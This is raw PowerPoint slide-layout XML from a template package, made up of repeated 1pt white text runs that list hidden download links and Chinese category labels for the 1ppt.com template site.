              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout169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69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69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69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7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70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70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70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70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70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70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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout170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70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70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70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7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71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71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71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71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71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71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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout171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71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71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71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7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72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72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72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72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72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72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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
